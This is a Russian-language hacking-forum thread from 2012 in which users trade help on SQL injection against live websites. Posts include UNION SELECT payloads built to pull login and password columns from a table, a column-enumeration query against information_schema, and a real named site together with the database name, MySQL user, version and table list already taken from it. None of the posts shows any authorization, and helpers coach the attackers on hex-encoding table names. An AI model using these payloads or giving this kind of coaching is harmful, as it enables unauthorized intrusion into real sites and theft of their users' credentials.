HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #51  
Старый 04.05.2012, 01:00
FROD-ik
Новичок
Регистрация: 16.03.2010
Сообщений: 28
С нами: 8503122

Репутация: 0
По умолчанию

Цитата:

Сообщение от D@Gshram

помогите кто-нибудь раскрутить sql. дам 150руб кто объяснит последние три шага +лог.пароль. BL 17

это говорит, что Вы нихера ничего не читали, а тока ждете когда за вас все сделают...
Ваши 150р. никому не нужны, уже наверно и базу слили и пароль админа получил)
 
Ответить с цитированием

  #52  
Старый 16.05.2012, 01:00
rossamaha
Участник форума
Регистрация: 23.07.2010
Сообщений: 138
С нами: 8318486

Репутация: -24
По умолчанию

Здравствуйте, нашел скуль на одном сайте, выполнил все действия и перешел уже почти казалось к выводу данных из колонки login,pass и тут такая хрень,

код который использовал.

source:

Код:
site.com/news.php?
id
=-14+UNION+SELECT+1,group_concat(
id
,0x3b,login,0x3b,pass),3,4,5,6,7,8+from+master_login

Вывода на экран не было. только, ошибка вылетела

code:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/u0786019/data/www/site.com/news.php on line 122

и вместо данных получил.
{TOPTITLE}
 
Ответить с цитированием

  #53  
Старый 16.05.2012, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Попробуй master_login в SQL-Hex закатать.
 
Ответить с цитированием

  #54  
Старый 20.07.2012, 01:00
lex1094
Новичок
Регистрация: 26.07.2012
Сообщений: 0
С нами: 7261526

Репутация: 0
По умолчанию

Подниму тему, так как возник вопрос.
Не могу определить наименование колонок одной из таблиц.
Ввожу site.com/index.php?action=price&id=-1+UNION+SELECT+1,2,3,4,group_concat(column_name),6 ,7,8,9,10,11+from+information_schema.columns+where +table_name= 0x61646d696e--
И ничего не происходит. И объясните пожалуйста, что это такое: 0x61646d696e?
Как мне правильно сделать запрос, чтобы получить информацию?
 
Ответить с цитированием

  #55  
Старый 21.07.2012, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

0x61646d696e это sql-hex. 0x просто указывает sql, что следом идёт heх строка. В данном случае там должно быть имя таблицы, колонки которой ты пытаешься узнать.
 
Ответить с цитированием

  #56  
Старый 21.07.2012, 01:00
lex1094
Новичок
Регистрация: 26.07.2012
Сообщений: 0
С нами: 7261526

Репутация: 0
По умолчанию

Цитата:

Сообщение от M@ZAX@KEP

0x61646d696e это sql-hex. 0x просто указывает sql, что следом идёт heх строка. В данном случае там должно быть имя таблицы, колонки которой ты пытаешься узнать.

Всё равно не получается узнать колонки, просто ошибку выдаёт и всё. Почему так происходит?
 
Ответить с цитированием

  #57  
Старый 22.07.2012, 01:00
lex1094
Новичок
Регистрация: 26.07.2012
Сообщений: 0
С нами: 7261526

Репутация: 0
По умолчанию

Вот тот самый сайт: http://www.climatelab.ru/index.php?action=price&pid=2
Вот данные которые я уже вытянул:

Цитата:


Появившеяся цифра: 5
Текущая БД: climatea_clim
Текущий пользователь MySQL: climatea_clim@localhost
Версия MySQL: 5.1.63-cll

Таблицы:
CHARACTER_SETS
CLIENT_STATISTICS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
INDEX_STATISTICS
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEY_COLUMN_USAGE
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TABLE_STATISTICS
THREAD_STATISTICS
TRIGGERS
USER_PRIVILEGES
USER_STATISTICS
VIEWS
climat_aqua
climat_aqua_prod
climat_catalog
climat_catalog_prod
climat_climat
climat_condit
climat_condit_prod
climat_config
climat_count
climat_news
climat_pages
climat_split
 
Ответить с цитированием

  #58  
Старый 22.07.2012, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Ты хочешь чтобы за тебя раскрутили или хочешь понять, в чём твоя ошибка и почему мускуль выдаёт error? Тогда тащи саму ошибку и запрос, с которым её получил.
 
Ответить с цитированием

  #59  
Старый 22.07.2012, 01:00
M@ZAX@KEP
Участник форума
Регистрация: 11.06.2009
Сообщений: 159
С нами: 8903558

Репутация: 60
По умолчанию

Экстрасенсов нет. Тащи ошибку.
 
Ответить с цитированием

  #60  
Старый 23.07.2012, 01:00
lex1094
Новичок
Регистрация: 26.07.2012
Сообщений: 0
С нами: 7261526

Репутация: 0
По умолчанию

Цитата:

Сообщение от M@ZAX@KEP

Ты хочешь чтобы за тебя раскрутили или хочешь понять, в чём твоя ошибка и почему мускуль выдаёт error?

Я хочу понять в чём моя ошибка. Мне бы расписать что я делаю не так и показать пример, как нужно делать правильно, раскручивать за меня я не прошу.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...
×

ESCROW ADMIN PANEL

Загрузка...
Загрузка...